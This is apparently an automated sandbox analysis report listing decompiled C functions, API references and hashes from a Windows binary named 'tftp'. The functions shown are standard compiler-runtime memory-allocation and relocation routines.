Instruction Fuzzy Hash: 3F01D472A083104AD320EEAE95C529FBBA5AFD0754F408D3FFC945B385D639C99487CA

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE64, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E0040DE64(intOrPtr __eax) {
				intOrPtr _v20;
				char* _v24;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr _t17;
				intOrPtr* _t21;
				intOrPtr _t23;
				void* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr* _t28;

				_t28 =  &_v20;
				_t23 = __eax;
				if(__eax != 0) {
					_t11 =  *0x41dac8;
					if(_t11 == 0) {
						_t11 = E0040DD2C();
						 *0x41dac8 = _t11;
					}
					 *_t28 = _t11;
					E00411108(_t24);
					_t13 =  *0x41dacc;
					if(_t13 == 0) {
						_t13 = E0040DD08();
						 *0x41dacc = _t13;
					}
					_t25 =  *_t13;
					if(_t25 == 0) {
						L9:
						_v20 = _t23;
						_v24 = "%p not found?!?!\n";
						 *_t28 = __imp___iob + 0x40;
						fprintf(??, ??);
						goto L10;
					} else {
						if(_t23 != _t25) {
							while(1) {
								_t26 =  *((intOrPtr*)(_t25 + 0xc));
								if(_t26 == 0) {
									goto L9;
								}
								if(_t23 == _t26) {
									_t27 = _t25;
									L14:
									_t4 = _t23 + 8;
									 *_t4 =  *((intOrPtr*)(_t23 + 8)) - 1;
									if( *_t4 != 0) {
										L10:
										_t17 =  *0x41dac8;
										if(_t17 == 0) {
											_t17 = E0040DD2C();
											 *0x41dac8 = _t17;
										}
										 *_t28 = _t17;
										return E00411070(_t26);
									}
									_t6 = _t23 + 4; // 0x4
									 *_t28 = _t6;
									E00410BB4(_t25);
									if(_t27 == 0) {
										_t21 =  *0x41dacc;
										if(_t21 == 0) {
											_t21 = E0040DD08();
											 *0x41dacc = _t21;
										}
										_t26 =  *((intOrPtr*)(_t23 + 0xc));
										 *_t21 =  *((intOrPtr*)(_t23 + 0xc));
										L17:
										 *_t28 = _t23;
										free(??);
										goto L10;
									}
									 *((intOrPtr*)(_t27 + 0xc)) =  *((intOrPtr*)(_t23 + 0xc));
									goto L17;
								}
								_t25 = _t26;
							}
							goto L9;
						}
						_t27 = 0;
						goto L14;
					}
				}
				return __eax;
			}

0x0040de66
0x0040de69
0x0040de6d
0x0040de6f
0x0040de76
0x0040df12
0x0040df17
0x0040df17
0x0040de7c
0x0040de7f
0x0040de84
0x0040de8b
0x0040df21
0x0040df26
0x0040df26
0x0040de91
0x0040de95
0x0040dead
0x0040dead
0x0040deb1
0x0040dec1
0x0040dec4
0x00000000
0x0040de97
0x0040de99
0x0040dea6
0x0040dea6
0x0040deab
0x00000000
0x00000000
0x0040dea2
0x0040dee0
0x0040dee2
0x0040dee2
0x0040dee2
0x0040dee5
0x0040dec9
0x0040dec9
0x0040ded0
0x0040df06
0x0040df0b
0x0040df0b
0x0040ded2
0x00000000
0x0040ded5
0x0040dee7
0x0040deea
0x0040deed
0x0040def4
0x0040df34
0x0040df3b
0x0040df44
0x0040df49
0x0040df49
0x0040df3d
0x0040df40
0x0040defc
0x0040defc
0x0040deff
0x00000000
0x0040deff
0x0040def9
0x00000000
0x0040def9
0x0040dea4
0x0040dea4
0x00000000
0x0040dea6
0x0040df30
0x00000000
0x0040df30
0x0040de95
0x0040dedf

APIs

fprintf.MSVCRT ref: 0040DEC4
free.MSVCRT(?,?,?,00000000,0040DFC4,?,0041432C,?,0040E010), ref: 0040DEFF

Strings

%p not found?!?!, xrefs: 0040DEB1

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: fprintffree
String ID: %p not found?!?!
API String ID: 92069018-11085004
Opcode ID: 61f616a902c595abadd28ced3c43a72dcd23e66c337d4146d42106b787c80ccb
Instruction ID: 9b8cd66a0f12f9fad795dccc1b5f128174fdefeec515de23ea10f02c93f0a4c9
Opcode Fuzzy Hash: 61f616a902c595abadd28ced3c43a72dcd23e66c337d4146d42106b787c80ccb
Instruction Fuzzy Hash: 61214FB0E086028BCB10EFB6D48056A77A0BE54354719C43FE842EF795E73CD8499B9E

Uniqueness

Uniqueness Score: -1.00%

Function 004030F0, Relevance: 5.3, APIs: 4, Instructions: 297
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E004030F0(signed int __ecx, signed int __edx, void* __edi, int __ebp, intOrPtr _a4) {
				char _v12;
				intOrPtr* _v24;
				intOrPtr _v28;
				char* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v52;
				intOrPtr _v56;
				signed int _v60;
				char _v64;
				intOrPtr _v68;
				void* _v72;
				intOrPtr _v88;
				char _v104;
				intOrPtr* _v116;
				intOrPtr _v120;
				char* _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v144;
				intOrPtr _v148;
				signed int _v152;
				char _v156;
				signed char _v160;
				char _v196;
				intOrPtr* _v208;
				intOrPtr _v212;
				char* _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				signed int _v236;
				intOrPtr _v240;
				signed int _v244;
				char _v248;
				void* _v252;
				intOrPtr _v272;
				char _v288;
				intOrPtr* _v300;
				intOrPtr _v304;
				char* _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				signed int _v328;
				intOrPtr _v332;
				signed int _v336;
				char _v340;
				signed char _v344;
				intOrPtr _v364;
				intOrPtr _v388;
				char* _v392;
				intOrPtr _v416;
				char* _v420;
				intOrPtr _t110;
				void* _t111;
				intOrPtr _t113;
				intOrPtr _t118;
				intOrPtr _t124;
				void* _t129;
				intOrPtr _t131;
				intOrPtr _t136;
				intOrPtr _t142;
				intOrPtr _t144;
				unsigned int _t149;
				unsigned int _t167;
				signed int _t180;
				signed int _t181;
				signed char _t184;
				signed int _t185;
				signed int _t188;
				intOrPtr _t189;
				signed int _t190;
				void* _t194;
				int _t203;
				void* _t208;
				intOrPtr* _t209;
				intOrPtr* _t210;
				intOrPtr* _t212;
				intOrPtr* _t213;
				signed int* _t215;

				_t203 = __ebp;
				_t194 = __edi;
				_t188 = __edx;
				_t180 = __ecx;
				_t209 = _t208 - 0x54;
				_v32 =  &_v12;
				 *_t209 =  &_v64;
				_v40 = E00401C90;
				_v36 = 0x4138c8;
				_v28 = 0x4031f5;
				_v24 = _t209;
				E0040C250(__ecx, __edx, __edi);
				_t110 = _a4 + 0x60;
				 *_t209 = _t110;
				_v68 = _t110;
				_t111 = malloc(__ebp);
				_v72 = _t111;
				if(_t111 == 0) {
					 *_t209 = 0x419020;
					_v60 = 1;
					if(E00410AC0() != 0) {
						L12:
						_t113 = E00413520();
						goto L13;
					} else {
						_t188 =  *0x419a40;
						if(_v68 > 0x200) {
							L9:
							E004029E0();
							_t180 = _v60;
							_t113 = _v56;
							_t188 = _v52;
							if(_t180 != 0) {
								_t180 = _t180 - 1;
								if(_t180 != 0) {
									asm("ud2");
									goto L12;
								}
							}
							L13:
							_t189 = _t188 + 1;
							 *_t209 = _t113;
							_v60 = 0xffffffff;
							if(_t189 != 0) {
								E0040C8C0();
							}
							E00402210(_t203);
							_t210 = _t209 - 0x58;
							_v124 =  &_v104;
							 *_t210 =  &_v156;
							_v132 = E00401C90;
							_v128 = 0x4138d8;
							_v120 = 0x4032ed;
							_v116 = _t210;
							E0040C250(_t180, _t189, _t203);
							_t118 = _v88;
							if(_v88 < 0x419a60 || _v88 >= 0x41da60) {
								 *_t210 = _t118 - 0x60;
								free(??);
								goto L19;
							} else {
								 *_t210 = 0x419020;
								_v160 = _t118 - 0x419a60;
								_v152 = 1;
								_v160 = _v160 >> 9;
								if(E00410AC0() != 0) {
									L25:
									_t124 = E00413520();
									goto L26;
								} else {
									_t180 = _v160 & 0x000000ff;
									 *_t210 = 0x419020;
									_v152 = 2;
									asm("rol eax, cl");
									 *0x419a40 =  *0x419a40 & 0xfffffffe;
									if(E00410634() == 0) {
										L19:
										 *_t210 =  &_v156;
										return E0040C3D0(_t180, _t189);
									} else {
										E00413550();
										_t180 = _v152;
										_t124 = _v148;
										_t189 = _v144;
										if(_t180 != 0) {
											_t180 = _t180 - 1;
											if(_t180 != 0) {
												asm("ud2");
												goto L25;
											}
										}
										L26:
										_t190 = _t189 + 1;
										 *_t210 = _t124;
										_v152 = 0xffffffff;
										if(_t190 != 0) {
											E0040C8C0();
										}
										E00402210(_t203);
										_t212 = _t210 - 0x54;
										_v216 =  &_v196;
										 *_t212 =  &_v248;
										_v224 = E00401C90;
										_v220 = 0x4138e8;
										_v212 = 0x403425;
										_v208 = _t212;
										E0040C250(_t180, _t190, _t194);
										 *_t212 = 0x50;
										_t129 = malloc(_t203);
										_v252 = _t129;
										if(_t129 == 0) {
											 *_t212 = 0x419020;
											_v244 = 1;
											if(E00410AC0() != 0) {
												L39:
												_t131 = E00413520();
												goto L40;
											} else {
												_t190 =  *0x419024;
												_t181 = 0;
												_t149 = _t190;
												while((_t149 & 0x00000001) != 0) {
													_t181 = _t181 + 1;
													_t149 = _t149 >> 1;
													if(_t181 == 0x20) {
														L36:
														E004029E0();
														_t180 = _v244;
														_t131 = _v240;
														_t190 = _v236;
														if(_t180 != 0) {
															_t180 = _t180 - 1;
															if(_t180 != 0) {
																asm("ud2");
																goto L39;
															}
														}
														L40:
														_t191 = _t190 + 1;
														 *_t212 = _t131;
														_v244 = 0xffffffff;
														if(_t190 + 1 != 0) {
															E0040C8C0();
														}
														E00402210(_t203);
														_t213 = _t212 - 0x58;
														_v308 =  &_v288;
														 *_t213 =  &_v340;
														_v316 = E00401C90;
														_v312 = 0x4138f8;
														_v304 = 0x403521;
														_v300 = _t213;
														E0040C250(_t180, _t191, _t203);
														_t136 = _v272;
														if(_v272 < 0x419040 || _v272 >= 0x419a40) {
															 *_t213 = _t136;
															free(??);
															goto L45;
														} else {
															_t191 = (_t136 - 0x419040) * 0xcccccccd >> 0x20;
															 *_t213 = 0x419020;
															_v336 = 1;
															_v344 = _t191;
															_v344 = _v344 >> 6;
															if(E00410AC0() != 0) {
																L51:
																_t142 = E00413520();
																goto L52;
															} else {
																_t180 = _v344 & 0x000000ff;
																 *_t213 = 0x419020;
																_v336 = 2;
																asm("rol eax, cl");
																 *0x419024 =  *0x419024 & 0xfffffffe;
																if(E00410634() == 0) {
																	L45:
																	 *_t213 =  &_v340;
																	return E0040C3D0(_t180, _t191);
																} else {
																	E00413550();
																	_t180 = _v336;
																	_t142 = _v332;
																	_t191 = _v328;
																	if(_t180 != 0) {
																		_t180 = _t180 - 1;
																		if(_t180 != 0) {
																			asm("ud2");
																			goto L51;
																		}
																	}
																	L52:
																	 *_t213 = _t142;
																	_v336 = 0xffffffff;
																	if(_t191 + 1 != 0) {
																		E0040C8C0();
																	}
																	E00402210(_t203);
																	0;
																	_t144 = _v364;
																	if(_t144 != 0) {
																		return free();
																	}
																	asm("repe ret");
																	0;
																	0;
																	_t215 = _t213 - 0x1c;
																	_v388 = 0x1b;
																	_v392 = "pure virtual method called\n";
																	 *_t215 = 2;
																	L0040CEF0();
																	E004029E0();
																	_v416 = 0x1e;
																	_v420 = "deleted virtual method called\n";
																	 *(_t215 - 0x1c) = 2;
																	L0040CEF0();
																	E004029E0();
																	0;
																	0;
																	 *_t180 = 0x417308;
																	return _t144;
																}
															}
														}
													} else {
														continue;
													}
													goto L61;
												}
												 *0x419024 = 0x00000001 << _t181 | _t190;
												 *_t212 = 0x419020;
												_v252 = (_t181 + _t181 * 4 << 4) + 0x419040;
												_v244 = 2;
												if(E00410634() == 0) {
													goto L29;
												} else {
													E00413550();
													goto L36;
												}
											}
										} else {
											L29:
											 *((intOrPtr*)(E00402E00() + 4)) =  *((intOrPtr*)(_t157 + 4)) + 1;
											memset(_v252, 0, 0x14 << 2);
											 *((intOrPtr*)(_t212 + 0xc)) =  &_v248;
											E0040C3D0(0, _t190);
											return _v252;
										}
									}
								}
							}
						} else {
							_t167 = _t188;
							_t184 = 0;
							while((_t167 & 0x00000001) != 0) {
								_t184 = _t184 + 1;
								_t167 = _t167 >> 1;
								if(_t184 == 0x20) {
									goto L9;
								} else {
									continue;
								}
								goto L61;
							}
							_t185 = _t184 << 9;
							 *0x419a40 = 0x00000001 << _t184 | _t188;
							_t23 = _t185 + 0x419a60; // 0x419a60
							 *_t209 = 0x419020;
							_v72 = _t23;
							_v60 = 2;
							if(E00410634() == 0) {
								goto L1;
							} else {
								E00413550();
								goto L9;
							}
						}
					}
				} else {
					L1:
					 *((intOrPtr*)(E00402E00() + 4)) =  *((intOrPtr*)(_t173 + 4)) + 1;
					memset(_v72, 0, 0x18 << 2);
					 *((intOrPtr*)(_t209 + 0xc)) =  &_v64;
					_v72 = _v72 + 0x60;
					E0040C3D0(0, _t188);
					return _v72;
				}
				L61:
			}

0x004030f0
0x004030f0
0x004030f0
0x004030f0
0x004030f2
0x004030f9
0x00403101
0x00403104
0x0040310c
0x00403114
0x0040311c
0x00403120
0x00403129
0x0040312c
0x0040312f
0x00403133
0x0040313a
0x0040313e
0x00403177
0x0040317e
0x0040318d
0x0040320c
0x0040320c
0x00000000
0x0040318f
0x00403197
0x0040319d
0x004031f0
0x004031f0
0x004031f5
0x004031f9
0x004031fd
0x00403203
0x00403205
0x00403208
0x0040320a
0x00000000
0x0040320a
0x00403208
0x00403211
0x00403211
0x00403214
0x00403217
0x0040321f
0x00403221
0x00403221
0x00403226
0x00403231
0x00403238
0x00403240
0x00403243
0x0040324b
0x00403253
0x0040325b
0x0040325f
0x00403264
0x00403270
0x0040327f
0x00403282
0x00000000
0x00403298
0x0040329d
0x004032a4
0x004032a8
0x004032b0
0x004032bc
0x00403304
0x00403304
0x00000000
0x004032be
0x004032be
0x004032c8
0x004032cf
0x004032d7
0x004032d9
0x004032e6
0x00403287
0x0040328b
0x00403297
0x004032e8
0x004032e8
0x004032ed
0x004032f1
0x004032f5
0x004032fb
0x004032fd
0x00403300
0x00403302
0x00000000
0x00403302
0x00403300
0x00403309
0x00403309
0x0040330c
0x0040330f
0x00403317
0x00403319
0x00403319
0x0040331e
0x00403332
0x00403339
0x00403341
0x00403344
0x0040334c
0x00403354
0x0040335c
0x00403360
0x00403365
0x0040336c
0x00403373
0x00403377
0x004033a5
0x004033ac
0x004033bb
0x0040343c
0x0040343c
0x00000000
0x004033bd
0x004033bd
0x004033c3
0x004033c5
0x004033da
0x004033d0
0x004033d3
0x004033d8
0x00403420
0x00403420
0x00403425
0x00403429
0x0040342d
0x00403433
0x00403435
0x00403438
0x0040343a
0x00000000
0x0040343a
0x00403438
0x00403441
0x00403441
0x00403444
0x00403447
0x0040344f
0x00403451
0x00403451
0x00403456
0x00403461
0x00403468
0x00403470
0x00403473
0x0040347b
0x00403483
0x0040348b
0x0040348f
0x00403494
0x004034a0
0x004034ac
0x004034af
0x00000000
0x004034c5
0x004034cf
0x004034d1
0x004034d8
0x004034e0
0x004034e4
0x004034f0
0x00403538
0x00403538
0x00000000
0x004034f2
0x004034f2
0x004034fc
0x00403503
0x0040350b
0x0040350d
0x0040351a
0x004034b4
0x004034b8
0x004034c4
0x0040351c
0x0040351c
0x00403521
0x00403525
0x00403529
0x0040352f
0x00403531
0x00403534
0x00403536
0x00000000
0x00403536
0x00403534
0x0040353d
0x00403540
0x00403543
0x0040354b
0x0040354d
0x0040354d
0x00403552
0x0040355d
0x00403560
0x00403566
0x0040cf70
0x0040cf70
0x00403570
0x00403578
0x0040357c
0x00403580
0x00403583
0x0040358b
0x00403593
0x0040359a
0x0040359f
0x004035b3
0x004035bb
0x004035c3
0x004035ca
0x004035cf
0x004035da
0x004035de
0x004035e0
0x004035e6
0x004035e6
0x0040351a
0x004034f0
0x00000000
0x00000000
0x00000000
0x00000000
0x004033d8
0x004033e7
0x004033f7
0x004033fe
0x00403402
0x00403411
0x00000000
0x00403417
0x00403417
0x00000000
0x00403417
0x00403411
0x00403379
0x00403379
0x00403387
0x0040338d
0x00403393
0x00403396
0x004033a4
0x004033a4
0x00403377
0x004032e6
0x004032bc
0x0040319f
0x0040319f
0x004031a1
0x004031af
0x004031a5
0x004031a8
0x004031ad
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004031ad
0x004031bc
0x004031bf
0x004031c4
0x004031ca
0x004031d1
0x004031d5
0x004031e4
0x00000000
0x004031ea
0x004031ea
0x00000000
0x004031ea
0x004031e4
0x0040319d
0x00403140
0x00403140
0x0040314e
0x00403154
0x0040315e
0x00403164
0x00403168
0x00403176
0x00403176
0x00000000

APIs

malloc.MSVCRT ref: 00403133
free.MSVCRT ref: 00403282

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 029944de0fd4748b7762924a877016d8f2ffbb52ab06fbdbbc0f44635844651d
Instruction ID: 78fce27b9a83fff6d5c49d9d3cfeaaa610375ac0e6ed6bd8c8365bc0feb9f57e
Opcode Fuzzy Hash: 029944de0fd4748b7762924a877016d8f2ffbb52ab06fbdbbc0f44635844651d
Instruction Fuzzy Hash: 0EB17CB15083418BC704EF65C59525FBBE5BF88349F044A2EF4C5A7391E778DA88CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B650, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040B650(char* __eax, intOrPtr __ebx, char* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr __ebp) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v36;
				intOrPtr _v44;
				char* _v56;
				void* _v60;
				char _v61;
				char _v62;
				intOrPtr _v80;
				char* _v84;
				char** _v88;
				char* _v96;
				intOrPtr _v100;
				char* _v104;
				char _v108;
				char _v112;
				signed int _v132;
				long _t72;
				signed int _t74;
				signed int* _t78;
				signed int _t79;
				signed int* _t81;
				signed char* _t82;
				intOrPtr _t83;
				void* _t84;
				intOrPtr _t88;
				char* _t93;
				intOrPtr* _t94;
				signed int _t96;
				intOrPtr _t98;
				char* _t102;
				intOrPtr _t108;
				char _t110;
				signed int _t114;
				signed int _t115;
				signed char _t121;
				char* _t128;
				intOrPtr _t134;
				signed short _t136;
				signed int _t137;
				char* _t141;
				void* _t142;
				intOrPtr* _t143;
				char** _t144;
				char** _t145;
				intOrPtr* _t147;
				void* _t149;

				_t139 = __ebp;
				_t107 = __edx;
				_t100 = __ecx;
				_t143 = _t142 - 0x5c;
				_v16 = __ebx;
				_t93 = __eax;
				_v84 = 0x1c;
				_v88 =  &_v56;
				 *_t143 = __eax;
				_v12 = __esi;
				_t134 = __edx;
				_v8 = __edi;
				_t128 = __ecx;
				_v4 = __ebp;
				_t72 = VirtualQuery(??, ??, ??);
				_t144 = _t143 - 0xc;
				if(_t72 == 0) {
					_v84 = _t93;
					_v88 = 0x1c;
					 *_t144 = "  VirtualQuery failed for %d bytes at address %p";
					E0040B5F0(_t100, _t107, _t128, _t134, __ebp);
					_t74 =  *0x41da84;
					if(_t74 == 0) {
						_t74 = 0;
						 *0x41da84 = 1;
						if(0x417500 <= 7) {
							goto L10;
						} else {
							_t145 = _t144 - 0x2c;
							_v104 = _t93;
							_v100 = _t134;
							_v96 = _t128;
							if(0x417500 <= 0xb) {
								_t94 = 0x417500;
								goto L28;
							} else {
								_t134 =  *0x417500; // 0x0
								if(_t134 != 0) {
									L23:
									_t94 = 0x417500;
									goto L24;
								} else {
									_t98 =  *0x417504; // 0x0
									if(_t98 != 0) {
										goto L23;
									} else {
										_t100 =  *0x417508; // 0x0
										_t94 = 0x41750c;
										if(_t100 == 0) {
											L28:
											_t107 =  *_t94;
											if( *_t94 != 0) {
												L24:
												while(_t94 < 0x417500) {
													_t46 = _t94 + 4; // 0x0
													_t108 =  *_t46;
													_t47 = _t108 + 0x400000; // 0x400000
													_t48 = _t108 + 0x400000; // 0x905a4d
													_t110 =  *_t48 +  *_t94;
													_t94 = _t94 + 8;
													_v108 = _t110;
													_t74 = E0040B650(_t47, _t94, 4,  &_v108, _t128, _t134, _t139);
												}
												goto L26;
											} else {
												_t54 = _t94 + 4; // 0x0
												_t74 =  *_t54;
												if(_t74 == 0) {
													goto L17;
												} else {
													goto L24;
												}
											}
										} else {
											_t94 = 0x417500;
											L17:
											_t39 = _t94 + 8; // 0x0
											_t74 =  *_t39;
											if(_t74 != 1) {
												_v132 = _t74;
												 *_t145 = "  Unknown pseudo relocation protocol version %d.\n";
												E0040B5F0(_t100, _t107, _t128, _t134, _t139);
												0;
												0;
												_t78 =  *0x414328; // 0x413824
												_t79 =  *_t78;
												if(_t79 != 0) {
													_t149 = _t145 - 0xc;
													do {
														 *_t79();
														_t81 =  *0x414328; // 0x413824
														_t63 =  &(_t81[1]); // 0x413828
														_t64 =  &(_t81[1]); // 0x10d00ff
														_t79 =  *_t64;
														 *0x414328 = _t63;
													} while (_t79 != 0);
													_t145 = _t149 + 0xc;
												}
												asm("repe ret");
												_push(_t94);
												_t147 = _t145 - 0x18;
												_t96 =  *0x413810; // 0xffffffff
												if(_t96 == 0xffffffff) {
													_t96 = 0;
													while(1) {
														_t67 = _t96 + 1; // 0x2
														_t79 = _t67;
														if(0x413810[_t79] == 0) {
															break;
														}
														_t96 = _t79;
													}
												}
												if(_t96 != 0) {
													do {
														_t79 = 0x413810[_t96]();
														_t96 = _t96 - 1;
													} while (_t96 != 0);
												}
												 *_t147 = 0x40b940;
												E004012C0();
												return _t79;
											} else {
												while(1) {
													_t94 = _t94 + 0xc;
													if(_t94 >= 0x417500) {
														break;
													}
													_t40 = _t94 + 8; // 0x64742820
													_t114 =  *_t40 & 0x000000ff;
													_t41 = _t94 + 4; // 0x3a434347
													_t134 =  *_t41;
													_t102 =  *_t94;
													_t42 = _t134 + 0x400000; // 0x3a834347
													_t82 = _t42;
													_t128 =  *(_t102 + 0x400000);
													if(_t114 == 0x10) {
														_t136 =  *(_t134 + 0x400000) & 0x0000ffff;
														_t115 = _t136 & 0x0000ffff;
														if(_t136 < 0) {
															_t115 = _t115 | 0xffff0000;
														}
														_v112 = _t115 - _t102 - 0x400000 + _t128;
														_t74 = E0040B650(_t82, _t94, 2,  &_v112, _t128, _t136, _t139);
														continue;
													} else {
														if(_t114 == 0x20) {
															_v112 = _t128 - _t102 + 0x400000 +  *_t82;
															_t74 = E0040B650(_t82, _t94, 4,  &_v112, _t128 - _t102 + 0x400000 +  *_t82, _t134, _t139);
															continue;
														} else {
															if(_t114 == 8) {
																_t121 =  *_t82 & 0x000000ff;
																_t137 = _t121 & 0x000000ff;
																if(_t121 < 0) {
																	_t137 = _t137 | 0xffffff00;
																}
																_v112 = _t137 - 0x400000 - _t102 + _t128;
																_t74 = E0040B650(_t82, _t94, 1,  &_v112, _t128, _t137, _t139);
																continue;
															} else {
																_v132 = _t114;
																 *_t145 = "  Unknown pseudo relocation bit size %d.\n";
																_v112 = 0;
																_t74 = E0040B5F0(_t102, _t114, _t128, _t134, _t139);
																goto L23;
															}
														}
													}
													break;
												}
												L26:
												return _t74;
											}
										}
									}
								}
							}
						}
					} else {
						L10:
						return _t74;
					}
				} else {
					_t83 = _v36;
					if(_t83 != 4) {
						if(_t83 == 0x40) {
							goto L2;
						} else {
							_t141 =  &_v60;
							_v80 = _t141;
							_v84 = 0x40;
							_v88 = _v44;
							 *_t144 = _v56;
							VirtualProtect(??, ??, ??, ??);
							_t144 = _t144 - 0x10;
							_t88 = _v36;
							_v84 = _t128;
							_v88 = _t134;
							 *_t144 = _t93;
							_v62 = _t88 != 0x40;
							_v61 = _t88 != 4;
							_t84 = memcpy(??, ??, ??);
							if(_v61 != 0 && _v62 != 0) {
								_v80 = _t141;
								_v84 = _v60;
								_v88 = _v44;
								 *_t144 = _v56;
								_t84 = VirtualProtect(??, ??, ??, ??);
								_t144 = _t144 - 0x10;
							}
						}
					} else {
						L2:
						_v84 = _t128;
						_v88 = _t134;
						 *_t144 = _t93;
						_t84 = memcpy(??, ??, ??);
					}
					return _t84;
				}
			}

0x0040b650
0x0040b650
0x0040b650
0x0040b650
0x0040b653
0x0040b657
0x0040b65d
0x0040b665
0x0040b669
0x0040b66c
0x0040b670
0x0040b672
0x0040b676
0x0040b678
0x0040b67c
0x0040b681
0x0040b686
0x0040b746
0x0040b74a
0x0040b752
0x0040b759
0x0040b760
0x0040b767
0x0040b775
0x0040b77d
0x0040b787
0x00000000
0x0040b789
0x0040b789
0x0040b78f
0x0040b793
0x0040b797
0x0040b79b
0x0040b880
0x00000000
0x0040b7a1
0x0040b7a1
0x0040b7a9
0x0040b834
0x0040b834
0x00000000
0x0040b7af
0x0040b7af
0x0040b7b7
0x00000000
0x0040b7b9
0x0040b7b9
0x0040b7bf
0x0040b7c6
0x0040b885
0x0040b885
0x0040b889
0x0040b839
0x0040b83f
0x0040b841
0x0040b841
0x0040b849
0x0040b84f
0x0040b855
0x0040b857
0x0040b85a
0x0040b862
0x0040b867
0x00000000
0x0040b88b
0x0040b88b
0x0040b88b
0x0040b890
0x00000000
0x0040b896
0x00000000
0x0040b896
0x0040b890
0x0040b7cc
0x0040b7cc
0x0040b7d1
0x0040b7d1
0x0040b7d1
0x0040b7d7
0x0040b924
0x0040b928
0x0040b92f
0x0040b93a
0x0040b93e
0x0040b940
0x0040b945
0x0040b949
0x0040b94b
0x0040b950
0x0040b950
0x0040b952
0x0040b957
0x0040b95a
0x0040b95a
0x0040b95d
0x0040b963
0x0040b967
0x0040b967
0x0040b96a
0x0040b970
0x0040b971
0x0040b974
0x0040b97d
0x0040b9a3
0x0040b9a9
0x0040b9a9
0x0040b9a9
0x0040b9b5
0x00000000
0x00000000
0x0040b9a7
0x0040b9a7
0x0040b9b7
0x0040b981
0x0040b983
0x0040b983
0x0040b98a
0x0040b98a
0x0040b983
0x0040b992
0x0040b999
0x0040b9a2
0x0040b7dd
0x0040b7dd
0x0040b7dd
0x0040b7e6
0x00000000
0x00000000
0x0040b7ec
0x0040b7ec
0x0040b7f0
0x0040b7f0
0x0040b7f3
0x0040b7f8
0x0040b7f8
0x0040b7fe
0x0040b804
0x0040b898
0x0040b8a2
0x0040b8a5
0x0040b8a7
0x0040b8a7
0x0040b8bc
0x0040b8c4
0x00000000
0x0040b80a
0x0040b80d
0x0040b916
0x0040b91a
0x00000000
0x0040b813
0x0040b816
0x0040b8d0
0x0040b8d5
0x0040b8d8
0x0040b8da
0x0040b8da
0x0040b8f1
0x0040b8f9
0x00000000
0x0040b81c
0x0040b81c
0x0040b820
0x0040b827
0x0040b82f
0x00000000
0x0040b82f
0x0040b816
0x0040b80d
0x00000000
0x0040b804
0x0040b86f
0x0040b87e
0x0040b87e
0x0040b7d7
0x0040b7c6
0x0040b7b7
0x0040b7a9
0x0040b79b
0x0040b769
0x0040b769
0x0040b769
0x0040b769
0x0040b68c
0x0040b68c
0x0040b693
0x0040b6c3
0x00000000
0x0040b6c5
0x0040b6c9
0x0040b6cd
0x0040b6d1
0x0040b6d9
0x0040b6e1
0x0040b6e4
0x0040b6e9
0x0040b6ec
0x0040b6f0
0x0040b6f4
0x0040b6f8
0x0040b6fe
0x0040b706
0x0040b70b
0x0040b715
0x0040b722
0x0040b726
0x0040b72e
0x0040b736
0x0040b739
0x0040b73e
0x0040b73e
0x0040b715
0x0040b695
0x0040b695
0x0040b695
0x0040b699
0x0040b69d
0x0040b6a0
0x0040b6a0
0x0040b6b8
0x0040b6b8

APIs

VirtualQuery.KERNEL32 ref: 0040B67C
memcpy.MSVCRT ref: 0040B6A0
VirtualProtect.KERNEL32 ref: 0040B6E4
memcpy.MSVCRT ref: 0040B70B
VirtualProtect.KERNEL32 ref: 0040B739

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 0040B752

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: Virtual$Protectmemcpy$Query
String ID: VirtualQuery failed for %d bytes at address %p
API String ID: 228986436-2206166143
Opcode ID: 9821adee60aaa20840477f00d3a84b80664aaec5cd034fb052e12e0b0e99efbb
Instruction ID: 013ba2857c57134ab5f63bdaf225d05bc44c2755a099c312159a14ca7ac9b967
Opcode Fuzzy Hash: 9821adee60aaa20840477f00d3a84b80664aaec5cd034fb052e12e0b0e99efbb
